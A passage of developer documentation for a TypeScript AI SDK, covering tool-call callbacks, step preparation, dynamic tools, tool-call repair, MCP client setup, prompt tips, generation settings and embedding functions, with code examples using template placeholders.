import { generateText } from 'ai';

const result = await generateText({
  // ... model, tools, prompt
  experimental_onToolCallStart({ toolName, toolCallId, input }) {
    console.log(`Calling tool: ${toolName}`, { toolCallId, input });
  },
  experimental_onToolCallFinish({
    toolName,
    toolCallId,
    output,
    error,
    durationMs,
  }) {
    if (error) {
      console.error(`Tool ${toolName} failed after ${durationMs}ms:`, error);
    } else {
      console.log(`Tool ${toolName} completed in ${durationMs}ms`, { output });
    }
  },
});

Errors thrown inside these callbacks are silently caught and do not break the generation flow.

`prepareStep` callback

The prepareStep callback is called before a step is started.

It is called with the following parameters:

model: The model that was passed into generateText.
stopWhen: The stopping condition that was passed into generateText.
stepNumber: The number of the step that is being executed.
steps: The steps that have been executed so far.
messages: The messages that will be sent to the model for the current step.
experimental_context: The context passed via the experimental_context setting (experimental).

You can use it to provide different settings for a step, including modifying the input messages.

import { generateText } from 'ai';

const result = await generateText({
  // ...
  prepareStep: async ({ model, stepNumber, steps, messages }) => {
    if (stepNumber === 0) {
      return {
        // use a different model for this step:
        model: modelForThisParticularStep,
        // force a tool choice for this step:
        toolChoice: { type: 'tool', toolName: 'tool1' },
        // limit the tools that are available for this step:
        activeTools: ['tool1'],
      };
    }

    // when nothing is returned, the default settings are used
  },
});

Message Modification for Longer Agentic Loops

In longer agentic loops, you can use the messages parameter to modify the input messages for each step. This is particularly useful for prompt compression:

prepareStep: async ({ stepNumber, steps, messages }) => {
  // Compress conversation history for longer loops
  if (messages.length > 20) {
    return {
      messages: messages.slice(-10),
    };
  }

  return {};
},

Provider Options for Step Configuration

You can use providerOptions in prepareStep to pass provider-specific configuration for each step. This is useful for features like Anthropic's code execution container persistence:

import { forwardAnthropicContainerIdFromLastStep } from '@ai-sdk/anthropic';

// Propagate container ID from previous step for code execution continuity
prepareStep: forwardAnthropicContainerIdFromLastStep,

Response Messages

Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.

The response.messages property contains an array of ModelMessage objects that you can add to your conversation history:

import { generateText, ModelMessage } from 'ai';

const messages: ModelMessage[] = [
  // ...
];

const { response } = await generateText({
  // ...
  messages,
});

// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)

Dynamic Tools

AI SDK Core supports dynamic tools for scenarios where tool schemas are not known at compile time. This is useful for:

MCP (Model Context Protocol) tools without schemas
User-defined functions at runtime
Tools loaded from external sources

Using dynamicTool

The dynamicTool helper creates tools with unknown input/output types:

import { dynamicTool } from 'ai';
import { z } from 'zod';

const customTool = dynamicTool({
  description: 'Execute a custom function',
  inputSchema: z.object({}),
  execute: async input => {
    // input is typed as 'unknown'
    // You need to validate/cast it at runtime
    const { action, parameters } = input as any;

    // Execute your dynamic logic
    return { result: `Executed ${action}` };
  },
});

Type-Safe Handling

When using both static and dynamic tools, use the dynamic flag for type narrowing:

const result = await generateText({
  model: __MODEL__,
  tools: {
    // Static tool with known types
    weather: weatherTool,
    // Dynamic tool
    custom: dynamicTool({
      /* ... */
    }),
  },
  onStepFinish: ({ toolCalls, toolResults }) => {
    // Type-safe iteration
    for (const toolCall of toolCalls) {
      if (toolCall.dynamic) {
        // Dynamic tool: input is 'unknown'
        console.log('Dynamic:', toolCall.toolName, toolCall.input);
        continue;
      }

      // Static tool: full type inference
      switch (toolCall.toolName) {
        case 'weather':
          console.log(toolCall.input.location); // typed as string
          break;
      }
    }
  },
});

Preliminary Tool Results

You can return an AsyncIterable over multiple results. In this case, the last value from the iterable is the final tool result.

This can be used in combination with generator functions to e.g. stream status information during the tool execution:

tool({
  description: 'Get the current weather.',
  inputSchema: z.object({
    location: z.string(),
  }),
  async *execute({ location }) {
    yield {
      status: 'loading' as const,
      text: `Getting weather for ${location}`,
      weather: undefined,
    };

    await new Promise(resolve => setTimeout(resolve, 3000));

    const temperature = 72 + Math.floor(Math.random() * 21) - 10;

    yield {
      status: 'success' as const,
      text: `The weather in ${location} is ${temperature}°F`,
      temperature,
    };
  },
});

Tool Choice

You can use the toolChoice setting to influence when a tool is selected. It supports the following settings:

auto (default): the model can choose whether and which tools to call.
required: the model must call a tool. It can choose which tool to call.
none: the model must not call tools
{ type: 'tool', toolName: string (typed) }: the model must call the specified tool

import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  toolChoice: 'required', // force the model to call a tool
  prompt: 'What is the weather in San Francisco?',
});

Tool Execution Options

When tools are called, they receive additional options as a second parameter.

Tool Call ID

The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.

import {
  streamText,
  tool,
  createUIMessageStream,
  createUIMessageStreamResponse,
} from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      const result = streamText({
        // ...
        messages,
        tools: {
          myTool: tool({
            // ...
            execute: async (args, { toolCallId }) => {
              // return e.g. custom status for tool call
              writer.write({
                type: 'data-tool-status',
                id: toolCallId,
                data: {
                  name: 'myTool',
                  status: 'in-progress',
                },
              });
              // ...
            },
          }),
        },
      });

      writer.merge(result.toUIMessageStream());
    },
  });

  return createUIMessageStreamResponse({ stream });
}

Messages

import { generateText, tool } from 'ai';

const result = await generateText({
  // ...
  tools: {
    myTool: tool({
      // ...
      execute: async (args, { messages }) => {
        // use the message history in e.g. calls to other language models
        return { ... };
      },
    }),
  },
});

Abort Signals

import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  abortSignal: myAbortSignal, // signal that will be forwarded to tools
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }, { abortSignal }) => {
        return fetch(
          `https://api.weatherapi.com/v1/current.json?q=${location}`,
          { signal: abortSignal }, // forward the abort signal to fetch
        );
      },
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Context (experimental)

You can pass in arbitrary context from generateText or streamText via the experimental_context setting. This context is available in the experimental_context tool execution option.

const result = await generateText({
  // ...
  tools: {
    someTool: tool({
      // ...
      execute: async (input, { experimental_context: context }) => {
        const typedContext = context as { example: string }; // or use type validation library
        // ...
      },
    }),
  },
  experimental_context: { example: '123' },
});

Tool Input Lifecycle Hooks

The following tool input lifecycle hooks are available:

onInputStart: Called when the model starts generating the input (arguments) for the tool call
onInputDelta: Called for each chunk of text as the input is streamed
onInputAvailable: Called when the complete input is available and validated

onInputStart and onInputDelta are only called in streaming contexts (when using streamText). They are not called when using generateText.

Example

import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const result = streamText({
  model: __MODEL__,
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
      onInputStart: () => {
        console.log('Tool call starting');
      },
      onInputDelta: ({ inputTextDelta }) => {
        console.log('Received input chunk:', inputTextDelta);
      },
      onInputAvailable: ({ input }) => {
        console.log('Complete input:', input);
      },
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Types

Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.

You can use them to strongly type your variables, function parameters, and return types in parts of the code that are not directly related to streamText or generateText.

import { TypedToolCall, TypedToolResult, generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const myToolSet = {
  firstTool: tool({
    description: 'Greets the user',
    inputSchema: z.object({ name: z.string() }),
    execute: async ({ name }) => `Hello, ${name}!`,
  }),
  secondTool: tool({
    description: 'Tells the user their age',
    inputSchema: z.object({ age: z.number() }),
    execute: async ({ age }) => `You are ${age} years old!`,
  }),
};

type MyToolCall = TypedToolCall<typeof myToolSet>;
type MyToolResult = TypedToolResult<typeof myToolSet>;

async function generateSomething(prompt: string): Promise<{
  text: string;
  toolCalls: Array<MyToolCall>; // typed tool calls
  toolResults: Array<MyToolResult>; // typed tool results
}> {
  return generateText({
    model: __MODEL__,
    tools: myToolSet,
    prompt,
  });
}

Handling Errors

The AI SDK has three tool-call related errors:

NoSuchToolError: the model tries to call a tool that is not defined in the tools object
InvalidToolInputError: the model calls a tool with inputs that do not match the tool's input schema
ToolCallRepairError: an error that occurred during tool call repair

When tool execution fails (errors thrown by your tool's execute function), the AI SDK adds them as tool-error content parts to enable automated LLM roundtrips in multi-step scenarios.

`generateText`

try {
  const result = await generateText({
    //...
  });
} catch (error) {
  if (NoSuchToolError.isInstance(error)) {
    // handle the no such tool error
  } else if (InvalidToolInputError.isInstance(error)) {
    // handle the invalid tool inputs error
  } else {
    // handle other errors
  }
}

Tool execution errors are available in the result steps:

const { steps } = await generateText({
  // ...
});

// check for tool errors in the steps
const toolErrors = steps.flatMap(step =>
  step.content.filter(part => part.type === 'tool-error'),
);

toolErrors.forEach(toolError => {
  console.log('Tool error:', toolError.error);
  console.log('Tool name:', toolError.toolName);
  console.log('Tool input:', toolError.input);
});

`streamText`

streamText sends errors as part of the full stream. Tool execution errors appear as tool-error parts, while other errors appear as error parts.

When using toUIMessageStreamResponse, you can pass an onError function to extract the error message from the error part and forward it as part of the stream response:

const result = streamText({
  // ...
});

return result.toUIMessageStreamResponse({
  onError: error => {
    if (NoSuchToolError.isInstance(error)) {
      return 'The model tried to call a unknown tool.';
    } else if (InvalidToolInputError.isInstance(error)) {
      return 'The model called a tool with invalid inputs.';
    } else {
      return 'An unknown error occurred.';
    }
  },
});

Tool Call Repair

Language models sometimes fail to generate valid tool calls, especially when the input schema is complex or the model is smaller.

You can use the experimental_repairToolCall function to attempt to repair the tool call with a custom function.

You can use different strategies to repair the tool call:

Use a model with structured outputs to generate the inputs.
Send the messages, system prompt, and tool schema to a stronger model to generate the inputs.
Provide more specific repair instructions based on which tool was called.

Example: Use a model with structured outputs for repair

import { openai } from '@ai-sdk/openai';
import { generateText, NoSuchToolError, Output, tool } from 'ai';

const result = await generateText({
  model,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    inputSchema,
    error,
  }) => {
    if (NoSuchToolError.isInstance(error)) {
      return null; // do not attempt to fix invalid tool names
    }

    const tool = tools[toolCall.toolName as keyof typeof tools];

    const { output: repairedArgs } = await generateText({
      model: __MODEL__,
      output: Output.object({ schema: tool.inputSchema }),
      prompt: [
        `The model tried to call the tool "${toolCall.toolName}"` +
          ` with the following inputs:`,
        JSON.stringify(toolCall.input),
        `The tool accepts the following schema:`,
        JSON.stringify(inputSchema(toolCall)),
        'Please fix the inputs.',
      ].join('\n'),
    });

    return { ...toolCall, input: JSON.stringify(repairedArgs) };
  },
});

Example: Use the re-ask strategy for repair

import { openai } from '@ai-sdk/openai';
import { generateText, NoSuchToolError, tool } from 'ai';

const result = await generateText({
  model,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    error,
    messages,
    system,
  }) => {
    const result = await generateText({
      model,
      system,
      messages: [
        ...messages,
        {
          role: 'assistant',
          content: [
            {
              type: 'tool-call',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              input: toolCall.input,
            },
          ],
        },
        {
          role: 'tool' as const,
          content: [
            {
              type: 'tool-result',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              output: error.message,
            },
          ],
        },
      ],
      tools,
    });

    const newToolCall = result.toolCalls.find(
      newToolCall => newToolCall.toolName === toolCall.toolName,
    );

    return newToolCall != null
      ? {
          type: 'tool-call' as const,
          toolCallId: toolCall.toolCallId,
          toolName: toolCall.toolName,
          input: JSON.stringify(newToolCall.input),
        }
      : null;
  },
});

Active Tools

It is an array of tool names that are currently active. By default, the value is undefined and all tools are active.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const { text } = await generateText({
  model: __MODEL__,
  tools: myToolSet,
  activeTools: ['firstTool'],
});

Multi-modal Tool Results

For Google, use base64 media parts (image-data / file-data) or base64 data: URLs in URL-style parts. Remote HTTP(S) URLs in tool-result URL parts are not supported.

In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.

AI SDK Core tools have an optional toModelOutput function that converts the tool result into a content part.

Here is an example for converting a screenshot into a content part:

const result = await generateText({
  model: __MODEL__,
  tools: {
    computer: anthropic.tools.computer_20241022({
      // ...
      async execute({ action, coordinate, text }) {
        switch (action) {
          case 'screenshot': {
            return {
              type: 'image',
              data: fs
                .readFileSync('./data/screenshot-editor.png')
                .toString('base64'),
            };
          }
          default: {
            return `executed ${action}`;
          }
        }
      },

      // map to tool result content for LLM consumption:
      toModelOutput({ output }) {
        return {
          type: 'content',
          value:
            typeof output === 'string'
              ? [{ type: 'text', text: output }]
              : [{ type: 'media', data: output.data, mediaType: 'image/png' }],
        };
      },
    }),
  },
  // ...
});

Extracting Tools

Once you start having many tools, you might want to extract them into separate files. The tool helper function is crucial for this, because it ensures correct type inference.

Here is an example of an extracted tool:

import { tool } from 'ai';
import { z } from 'zod';

// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async ({ location }) => ({
    location,
    temperature: 72 + Math.floor(Math.random() * 21) - 10,
  }),
});

MCP Tools

For detailed information about MCP tools, including initialization, transport options, and usage patterns, see the MCP Tools documentation.

AI SDK Tools vs MCP Tools

Aspect	AI SDK Tools	MCP Tools
Type Safety	Full static typing end-to-end	Dynamic discovery at runtime
Execution	Same process as your request (low latency)	Separate server (network overhead)
Prompt Control	Full control over descriptions and schemas	Controlled by MCP server owner
Schema Control	You define and optimize for your model	Controlled by MCP server owner
Version Management	Full visibility over updates	Can update independently (version skew risk)
Authentication	Same process, no additional auth required	Separate server introduces additional auth complexity
Best For	Production applications requiring control and performance	Development iteration, user-provided tools

Examples

You can see tools in action using various frameworks in the following examples:

title: Model Context Protocol (MCP) description: Learn how to connect to Model Context Protocol (MCP) servers and use their tools with AI SDK Core.

Model Context Protocol (MCP)

Initializing an MCP Client

Create an MCP client using one of the following transport options:

HTTP transport (Recommended): Either configure HTTP directly via the client using transport: { type: 'http', ... }, or use MCP's official TypeScript SDK StreamableHTTPClientTransport
SSE (Server-Sent Events): An alternative HTTP-based transport
stdio: For local development only. Uses standard input/output streams for local MCP servers

HTTP Transport (Recommended)

For production deployments, we recommend using the HTTP transport. You can configure it directly on the client:

import { createMCPClient } from '@ai-sdk/mcp';

const mcpClient = await createMCPClient({
  transport: {
    type: 'http',
    url: 'https://your-server.com/mcp',

    // optional: configure HTTP headers
    headers: { Authorization: 'Bearer my-api-key' },

    // optional: provide an OAuth client provider for automatic authorization
    authProvider: myOAuthClientProvider,

    // optional: reject redirect responses to prevent SSRF
    redirect: 'error',
  },
});

Alternatively, you can use StreamableHTTPClientTransport from MCP's official TypeScript SDK:

import { createMCPClient } from '@ai-sdk/mcp';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';

const url = new URL('https://your-server.com/mcp');
const mcpClient = await createMCPClient({
  transport: new StreamableHTTPClientTransport(url, {
    sessionId: 'session_123',
  }),
});

SSE Transport

SSE provides an alternative HTTP-based transport option. Configure it with a type and url property. You can also provide an authProvider for OAuth:

import { createMCPClient } from '@ai-sdk/mcp';

const mcpClient = await createMCPClient({
  transport: {
    type: 'sse',
    url: 'https://my-server.com/sse',

    // optional: configure HTTP headers
    headers: { Authorization: 'Bearer my-api-key' },

    // optional: provide an OAuth client provider for automatic authorization
    authProvider: myOAuthClientProvider,

    // optional: reject redirect responses to prevent SSRF
    redirect: 'error',
  },
});

Stdio Transport (Local Servers)

The Stdio transport can be imported from either the MCP SDK or the AI SDK:

import { createMCPClient } from '@ai-sdk/mcp';
import { StdioClientTransport } from '@modelcontextprotocol/sdk/client/stdio.js';
// Or use the AI SDK's stdio transport:
// import { Experimental_StdioMCPTransport as StdioClientTransport } from '@ai-sdk/mcp/mcp-stdio';

const mcpClient = await createMCPClient({
  transport: new StdioClientTransport({
    command: 'node',
    args: ['src/stdio/dist/server.js'],
  }),
});

Custom Transport

You can also bring your own transport by implementing the MCPTransport interface for specific requirements not covered by the standard transports.

Authorization via OAuth is supported when using the AI SDK MCP HTTP or SSE transports by providing an authProvider.

Closing the MCP Client

After initialization, you should close the MCP client based on your usage pattern:

For short-lived usage (e.g., single requests), close the client when the response is finished
For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates

When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:

const mcpClient = await createMCPClient({
  // ...
});

const tools = await mcpClient.tools();

const result = await streamText({
  model: __MODEL__,
  tools,
  prompt: 'What is the weather in Brooklyn, New York?',
  onFinish: async () => {
    await mcpClient.close();
  },
});

When generating responses without streaming, you can use try/finally or cleanup functions in your framework:

import { createMCPClient, type MCPClient } from '@ai-sdk/mcp';

let mcpClient: MCPClient | undefined;

try {
  mcpClient = await createMCPClient({
    // ...
  });
} finally {
  await mcpClient?.close();
}

Using MCP Tools

The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:

Schema Discovery

With schema discovery, all tools offered by the server are automatically listed, and input parameter types are inferred based on the schemas provided by the server:

const tools = await mcpClient.tools();

Schema Definition

For better type safety and control, you can define the tools and their input schemas explicitly in your client code:

import { z } from 'zod';

const tools = await mcpClient.tools({
  schemas: {
    'get-data': {
      inputSchema: z.object({
        query: z.string().describe('The data query'),
        format: z.enum(['json', 'text']).optional(),
      }),
    },
    // For tools with zero inputs, you should use an empty object:
    'tool-with-no-args': {
      inputSchema: z.object({}),
    },
  },
});

Typed Tool Outputs

When MCP servers return structuredContent (per the MCP specification), you can define an outputSchema to get typed tool results:

import { z } from 'zod';

const tools = await mcpClient.tools({
  schemas: {
    'get-weather': {
      inputSchema: z.object({
        location: z.string(),
      }),
      // Define outputSchema for typed results
      outputSchema: z.object({
        temperature: z.number(),
        conditions: z.string(),
        humidity: z.number(),
      }),
    },
  },
});

const result = await tools['get-weather'].execute(
  { location: 'New York' },
  { messages: [], toolCallId: 'weather-1' },
);

console.log(`Temperature: ${result.temperature}°C`);

When outputSchema is provided:

The client extracts structuredContent from the tool result
The output is validated against your schema at runtime
You get full TypeScript type safety for the result

If the server doesn't return structuredContent, the client falls back to parsing JSON from the text content. If neither is available or validation fails, an error is thrown.

Using MCP Resources

The MCP client provides three methods for working with resources:

Listing Resources

List all available resources from the MCP server:

const resources = await mcpClient.listResources();

Reading Resource Contents

Read the contents of a specific resource by its URI:

const resourceData = await mcpClient.readResource({
  uri: 'file:///example/document.txt',
});

Listing Resource Templates

Resource templates are dynamic URI patterns that allow flexible queries. List all available templates:

const templates = await mcpClient.listResourceTemplates();

Using MCP Prompts

According to the MCP specification, prompts are user-controlled templates that servers expose for clients to list and retrieve with optional arguments.

Listing Prompts

const prompts = await mcpClient.experimental_listPrompts();

Getting a Prompt

Retrieve prompt messages, optionally passing arguments defined by the server:

const prompt = await mcpClient.experimental_getPrompt({
  name: 'code_review',
  arguments: { code: 'function add(a, b) { return a + b; }' },
});

Handling Elicitation Requests

Enabling Elicitation Support

To enable elicitation, you need to advertise the capability when creating the MCP client:

const mcpClient = await createMCPClient({
  transport: {
    type: 'sse',
    url: 'https://your-server.com/sse',
  },
  capabilities: {
    elicitation: {},
  },
});

Registering an Elicitation Handler

Use the onElicitationRequest method to register a handler that will be called when the server requests input:

import { ElicitationRequestSchema } from '@ai-sdk/mcp';

mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
  // request.params.message: A message describing what input is needed
  // request.params.requestedSchema: JSON schema defining the expected input structure

  // Get input from the user (implement according to your application's needs)
  const userInput = await getInputFromUser(
    request.params.message,
    request.params.requestedSchema,
  );

  // Return the result with one of three actions:
  return {
    action: 'accept', // or 'decline' or 'cancel'
    content: userInput, // only required when action is 'accept'
  };
});

Elicitation Response Actions

Your handler must return an object with an action field that can be one of:

'accept': User provided the requested information. Must include content with the data.
'decline': User chose not to provide the information.
'cancel': User cancelled the operation entirely.

Examples

You can see MCP in action in the following examples:

title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.

Prompt Engineering

Tips

Prompts for Tools

When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.

Here are a few tips to help you get the best results:

Use a model that is strong at tool calling, such as gpt-5 or gpt-4.1. Weaker models will often struggle to call tools effectively and flawlessly.
Keep the number of tools low, e.g. to 5 or less.
Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for.
When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
You can include example input/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.

In general, the goal should be to give the model all information it needs in a clear way.

Tool & Structured Data Schemas

The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since the mapping is not one-to-one.

Zod Dates

const result = await generateText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      events: z.array(
        z.object({
          event: z.string(),
          date: z
            .string()
            .date()
            .transform(value => new Date(value)),
        }),
      ),
    }),
  }),
  prompt: 'List 5 important events from the year 2000.',
});

Optional Parameters

When working with tools that have optional parameters, you may encounter compatibility issues with certain providers that use strict schema validation.

For maximum compatibility, optional parameters should use .nullable() instead of .optional():

// This may fail with strict schema validation
const failingTool = tool({
  description: 'Execute a command',
  inputSchema: z.object({
    command: z.string(),
    workdir: z.string().optional(), // This can cause errors
    timeout: z.string().optional(),
  }),
});

// This works with strict schema validation
const workingTool = tool({
  description: 'Execute a command',
  inputSchema: z.object({
    command: z.string(),
    workdir: z.string().nullable(), // Use nullable instead
    timeout: z.string().nullable(),
  }),
});

Temperature Settings

For tool calls and object generation, it's recommended to use temperature: 0 to ensure deterministic and consistent results:

const result = await generateText({
  model: __MODEL__,
  temperature: 0, // Recommended for tool calls
  tools: {
    myTool: tool({
      description: 'Execute a command',
      inputSchema: z.object({
        command: z.string(),
      }),
    }),
  },
  prompt: 'Execute the ls command',
});

Lower temperature values reduce randomness in model outputs, which is particularly important when the model needs to:

Generate structured data with specific formats
Make precise tool calls with correct parameters
Follow strict schemas consistently

Debugging

Inspecting Warnings

const result = await generateText({
  model: __MODEL__,
  prompt: 'Hello, world!',
});

console.log(result.warnings);

HTTP Request Bodies

You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific way.

Request bodies are available via the request.body property of the response:

const result = await generateText({
  model: __MODEL__,
  prompt: 'Hello, world!',
});

console.log(result.request.body);

title: Settings description: Learn how to configure the AI SDK.

Settings

Large language models (LLMs) typically provide settings to augment their output.

All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:

const result = await generateText({
  model: __MODEL__,
  maxOutputTokens: 512,
  temperature: 0.3,
  maxRetries: 5,
  prompt: 'Invent a new holiday and describe its traditions.',
});

`maxOutputTokens`

Maximum number of tokens to generate.

`temperature`

Temperature setting.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means almost deterministic results, and higher values mean more randomness.

It is recommended to set either temperature or topP, but not both.

In AI SDK 5.0, temperature is no longer set to 0 by default.

`topP`

Nucleus sampling.

It is recommended to set either temperature or topP, but not both.

`topK`

Only sample from the top K options for each subsequent token.

Used to remove "long tail" low probability responses. Recommended for advanced use cases only. You usually only need to use temperature.

`presencePenalty`

The presence penalty affects the likelihood of the model to repeat information that is already in the prompt.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`frequencyPenalty`

The frequency penalty affects the likelihood of the model to repeatedly use the same words or phrases.

The value is passed through to the provider. The range depends on the provider and model. For most providers, 0 means no penalty.

`stopSequences`

The stop sequences to use for stopping the text generation.

If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.

`seed`

It is the seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.

`maxRetries`

Maximum number of retries. Set to 0 to disable retries. Default: 2.

`abortSignal`

An optional abort signal that can be used to cancel the call.

The abort signal can e.g. be forwarded from a user interface to cancel the call, or to define a timeout using AbortSignal.timeout.

Example: AbortSignal.timeout

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  abortSignal: AbortSignal.timeout(5000), // 5 seconds
});

`timeout`

An optional timeout in milliseconds. The call will be aborted if it takes longer than the specified duration.

This is a convenience parameter that creates an abort signal internally. It can be used alongside abortSignal - if both are provided, the call will abort when either condition is met.

You can specify the timeout either as a number (milliseconds) or as an object with totalMs, stepMs, and/or chunkMs properties:

totalMs: The total timeout for the entire call including all steps.
stepMs: The timeout for each individual step (LLM call). This is useful for multi-step generations where you want to limit the time spent on each step independently.
chunkMs: The timeout between stream chunks (streaming only). The call will abort if no new chunk is received within this duration. This is useful for detecting stalled streams.

Example: 5 second timeout (number format)

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: 5000, // 5 seconds
});

Example: 5 second total timeout (object format)

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: { totalMs: 5000 }, // 5 seconds
});

Example: 10 second step timeout

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: { stepMs: 10000 }, // 10 seconds per step
});

Example: Combined total and step timeout

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: {
    totalMs: 60000, // 60 seconds total
    stepMs: 10000, // 10 seconds per step
  },
});

Example: Per-chunk timeout for streaming (streamText only)

const result = streamText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  timeout: { chunkMs: 5000 }, // abort if no chunk received for 5 seconds
});

`headers`

Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

const result = await generateText({
  model: __MODEL__,
  prompt: 'Invent a new holiday and describe its traditions.',
  headers: {
    'Prompt-Id': 'my-prompt-id',
  },
});

title: Embeddings description: Learn how to embed values with the AI SDK.

Embeddings

Embedding a Single Value

The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words or phrases or clustering text. You can use it with embeddings models, e.g. openai.embeddingModel('text-embedding-3-large') or mistral.embeddingModel('mistral-embed').

import { embed } from 'ai';

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

The AI SDK provides the embedMany function for this purpose. Similar to embed, you can use it with embeddings models, e.g. openai.embeddingModel('text-embedding-3-large') or mistral.embeddingModel('mistral-embed').

import { embedMany } from 'ai';

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

Embedding Similarity

import { cosineSimilarity, embedMany } from 'ai';

const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});

console.log(
  `cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);

Token Usage

Many providers charge based on the number of tokens used to generate embeddings. Both embed and embedMany provide token usage information in the usage property of the result object:

import { embed } from 'ai';

const { embedding, usage } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

console.log(usage); // { tokens: 10 }

Settings

Provider Options

Embedding model settings can be configured using providerOptions for provider-specific parameters:

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  providerOptions: {
    openai: {
      dimensions: 512, // Reduce embedding dimensions
    },
  },
});

Parallel Requests

The embedMany function now supports parallel processing with configurable maxParallelCalls to optimize performance:

import { embedMany } from 'ai';

const { embeddings, usage } = await embedMany({
  maxParallelCalls: 2, // Limit parallel requests
  model: 'openai/text-embedding-3-small',
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

Retries

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  maxRetries: 0, // Disable retries
});

Abort Signals and Timeouts

Both embed and embedMany accept an optional abortSignal parameter of type AbortSignal that you can use to abort the embedding process or set a timeout.

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

Both embed and embedMany accept an optional headers parameter of type Record<string, string> that you can use to add custom headers to the embedding request.

import { embed } from 'ai';

const { embedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Response Information

Both embed and embedMany return response information that includes the raw provider response:

import { embed } from 'ai';

const { embedding, response } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'sunny day at the beach',
});

console.log(response); // Raw provider response

Embedding Middleware

